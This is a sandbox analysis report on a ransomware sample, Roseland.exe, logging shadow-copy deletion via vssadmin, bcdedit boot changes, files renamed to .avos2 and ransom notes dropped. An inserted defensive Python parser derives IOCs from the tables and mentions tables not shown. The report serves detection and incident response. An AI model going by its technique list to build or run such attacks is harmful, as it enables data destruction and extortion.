Malware Analysis Report

2024-10-16 03:28

Sample ID 230113-lcgmxsfh22
Target Roseland.bin
SHA256 bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
Tags
evasion ransomware
score
9/10


Analysis Overview

score
9/10

SHA256

bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

Threat Level: Likely malicious

The file Roseland.bin was found to be: Likely malicious.

Malicious Activity Summary

evasion ransomware

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

N/A (no techniques are mapped in this export of the report)

Analysis: static1

Detonation Overview

Reported

2023-01-13 09:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-13 09:23

Reported

2023-01-13 09:25

Platform

win7-20221111-en

Max time kernel

54s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\TestEnter.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyOpen.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\NewConvertTo.tif => C:\Users\Admin\Pictures\NewConvertTo.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResetSend.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ResetSend.tiff => C:\Users\Admin\Pictures\ResetSend.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\WatchPublish.tiff => C:\Users\Admin\Pictures\WatchPublish.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\BackupSet.raw => C:\Users\Admin\Pictures\BackupSet.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\PushSend.tif => C:\Users\Admin\Pictures\PushSend.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\GroupConfirm.crw => C:\Users\Admin\Pictures\GroupConfirm.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchPublish.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => C:\Users\Admin\Pictures\UninstallConnect.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\CompareAdd.raw => C:\Users\Admin\Pictures\CompareAdd.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DisableHide.png => C:\Users\Admin\Pictures\DisableHide.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DenyOpen.tiff => C:\Users\Admin\Pictures\DenyOpen.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\TestEnter.tiff => C:\Users\Admin\Pictures\TestEnter.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1715839980.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Games\Chess\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690Nmerical.XSL C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Concourse.thmx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00241_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DenyPop.xht C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.DPV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\MEIPreload\preloaded_data.pb C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\currency.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Google\Policies\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
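The two tables above (renamed user files and files created under Program Files) already contain the host-based IOCs a responder needs: the extension the encryptor appends, the ransom note filename, and which source extensions it targets. The following is an added example, not part of the sandbox report, that parses rows in the "Description Indicator Process Target" layout printed above and derives those IOCs. It assumes the rows are whitespace-separated exactly as shown and that the Process column contains no spaces (true for every row in this report, not in general); the sample rows are constructed from the tables above.

```python
"""
Added example (not part of the sandbox report): parse the
"Description Indicator Process Target" rows above and derive IOCs.
Assumptions: rows are whitespace separated as printed, and the Process
column has no spaces (true for this report, not guaranteed elsewhere).
"""
import re
import ntpath
from collections import Counter

# Constructed subset of rows copied from the report's tables.
SAMPLE_ROWS = [
    r"File opened for modification C:\Users\Admin\Pictures\TestEnter.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File renamed C:\Users\Admin\Pictures\NewConvertTo.tif => C:\Users\Admin\Pictures\NewConvertTo.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File renamed C:\Users\Admin\Pictures\BackupSet.raw => C:\Users\Admin\Pictures\BackupSet.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File renamed C:\Users\Admin\Pictures\GroupConfirm.crw => C:\Users\Admin\Pictures\GroupConfirm.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File renamed C:\Users\Admin\Pictures\DisableHide.png => C:\Users\Admin\Pictures\DisableHide.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File renamed C:\Users\Admin\Pictures\DenyOpen.tiff => C:\Users\Admin\Pictures\DenyOpen.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File created C:\Program Files\Microsoft Games\Chess\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File created C:\Program Files\VideoLAN\VLC\locale\hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
    r"File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A",
]

# Lazy path groups stop where exactly two space-free columns (Process, Target) remain.
RENAMED = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+?) (?P<proc>\S+) (?P<target>\S+)$")
CREATED = re.compile(r"^File created (?P<path>.+?) (?P<proc>\S+) (?P<target>\S+)$")
OPENED = re.compile(r"^File opened for modification (?P<path>.+?) (?P<proc>\S+) (?P<target>\S+)$")


def parse_row(row):
    """Return (kind, fields) for a known row layout, or None (e.g. 'N/A N/A ...' rows)."""
    for kind, rx in (("renamed", RENAMED), ("created", CREATED), ("opened", OPENED)):
        m = rx.match(row.strip())
        if m:
            return kind, m.groupdict()
    return None


def extract_iocs(rows):
    """Derive appended extension, ransom note name, victim extensions and encryptor image."""
    ext_added, note_names, victim_exts, processes = Counter(), Counter(), Counter(), Counter()
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        kind, f = parsed
        processes[f["proc"]] += 1
        if kind == "renamed":
            src, dst = f["src"], f["dst"]
            # The encryptor keeps the original name and appends its marker extension.
            if dst.startswith(src):
                ext_added[dst[len(src):]] += 1
            victim_exts[ntpath.splitext(src)[1].lower()] += 1
        elif kind == "created":
            # Heuristic: the note is dropped into every directory, so it dominates created files.
            note_names[ntpath.basename(f["path"])] += 1
    return {
        "appended_extension": ext_added.most_common(1)[0][0] if ext_added else None,
        "ransom_note": note_names.most_common(1)[0][0] if note_names else None,
        "victim_extensions": sorted(victim_exts),
        "encryptor_process": processes.most_common(1)[0][0] if processes else None,
        "renamed_count": sum(ext_added.values()),
    }


def hunt_globs(iocs):
    """Filename patterns to sweep other hosts for (empty if nothing was derived)."""
    globs = []
    if iocs["appended_extension"]:
        globs.append("*" + iocs["appended_extension"])
    if iocs["ransom_note"]:
        globs.append(iocs["ransom_note"])
    return globs


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_ROWS)
    for k, v in iocs.items():
        print(f"{k}: {v}")
    print("hunt:", hunt_globs(iocs))
```

On the rows above this yields the `.avos2` marker extension, the `GET_YOUR_FILES_BACK.txt` note and the image, raw-photo and TIFF source extensions; the same parser runs unchanged on the behavioral2 tables because the layout is identical.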

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege; privilege LUID not resolved to a name by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege; LUID not resolved) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege; LUID not resolved) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege; LUID not resolved) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege; LUID not resolved) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege; LUID not resolved) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
